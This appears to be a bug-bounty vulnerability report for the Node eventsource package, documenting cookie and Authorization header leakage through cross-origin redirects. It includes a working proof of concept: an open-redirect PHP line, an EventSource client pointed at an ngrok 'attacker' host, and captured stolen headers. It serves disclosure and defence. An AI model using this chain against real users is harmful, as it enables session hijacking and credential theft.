9.3 High
CVSS3
Attack Vector
NETWORK
Attack Complexity
LOW
Privileges Required
NONE
User Interaction
REQUIRED
Scope
CHANGED
Confidentiality Impact
HIGH
Integrity Impact
HIGH
Availability Impact
NONE
CVSS:3.1/AV:N/AC:L/PR:N/UI:R/S:C/C:H/I:H/A:N
5.8 Medium
CVSS2
Access Vector
NETWORK
Access Complexity
MEDIUM
Authentication
NONE
Confidentiality Impact
PARTIAL
Integrity Impact
PARTIAL
Availability Impact
NONE
AV:N/AC:M/Au:N/C:P/I:P/A:N
0.002 Low
EPSS
Percentile
54.9%
> Reported on Feb 6th 2022 | Timothee Desurmont
Vulnerability type: CWE-200
Cookies & Authorisation headers are leaked to external sites.
When fetching an url with a link to an external site (Redirect), the users Cookies & Autorisation headers are leaked to the third party application. According to the same-origin-policy, the header should be “sanitized”.
const express = require('express')
const app = express()
app.get('/', function (req, res) {
console.log(req.headers);
res.status(200).send()
})
app.listen(3000)
console.log('listening on port 3000');
ngrok http 3000
Session Status online
Account Timothee Desurmont (Plan: Free)
Update update available (version 2.3.40, Ctrl-U to update)
Version 2.3.35
Region United States (us)
Web Interface http://127.0.0.1:4040
Forwarding http://cb45-92-98-215-185.ngrok.io -> http://localhost:3000
Forwarding https://cb45-92-98-215-185.ngrok.io -> http://localhost:3000
Connections ttl opn rt1 rt5 p50 p90
1 0 0.00 0.00 8.92 8.92
HTTP Requests
-------------
GET / 200 OK
\var\www\html
(mysite) $redirect_url = $_GET['url'];
header("Location: " . $redirect_url);
const EventSource = require("eventsource")
const mysite = "http://192.168.2.31";
const attacker = "http://cb45-92-98-215-185.ngrok.io";
const options = {
method: 'GET',
headers: {
'Content-Type': 'application/json'
,'Cookie': 'ajs_anonymous_id=1234567890"',
"Authorization": "Bearer eyJhb12345abcdef"
}
};
var es = new EventSource(`${mysite}//redirect.php?url=${attacker}/`, options);
es.onerror = function (err) {
if (err) {
if (err.status === 401 || err.status === 403) {
console.log('not authorized');
}
}
};
[nodemon] starting `node server.js`
listening on port 3000
{
host: 'cb45-92-98-215-185.ngrok.io',
accept: 'text/event-stream',
authorization: 'Bearer eyJhb12345abcdef',
'cache-control': 'no-cache',
'content-type': 'application/json',
cookie: 'ajs_anonymous_id=1234567890"',
'x-forwarded-for': '92.98.215.185',
'x-forwarded-proto': 'http',
'accept-encoding': 'gzip'
}
Access Control: Hijack of victims account.
The attacker can steal the user’s credentials and then use these credentials to access the legitimate web site.
If the redirected url is different from the url domain, the Authentication & Cookies should be removed from the header.
9.3 High
CVSS3
Attack Vector
NETWORK
Attack Complexity
LOW
Privileges Required
NONE
User Interaction
REQUIRED
Scope
CHANGED
Confidentiality Impact
HIGH
Integrity Impact
HIGH
Availability Impact
NONE
CVSS:3.1/AV:N/AC:L/PR:N/UI:R/S:C/C:H/I:H/A:N
5.8 Medium
CVSS2
Access Vector
NETWORK
Access Complexity
MEDIUM
Authentication
NONE
Confidentiality Impact
PARTIAL
Integrity Impact
PARTIAL
Availability Impact
NONE
AV:N/AC:M/Au:N/C:P/I:P/A:N
0.002 Low
EPSS
Percentile
54.9%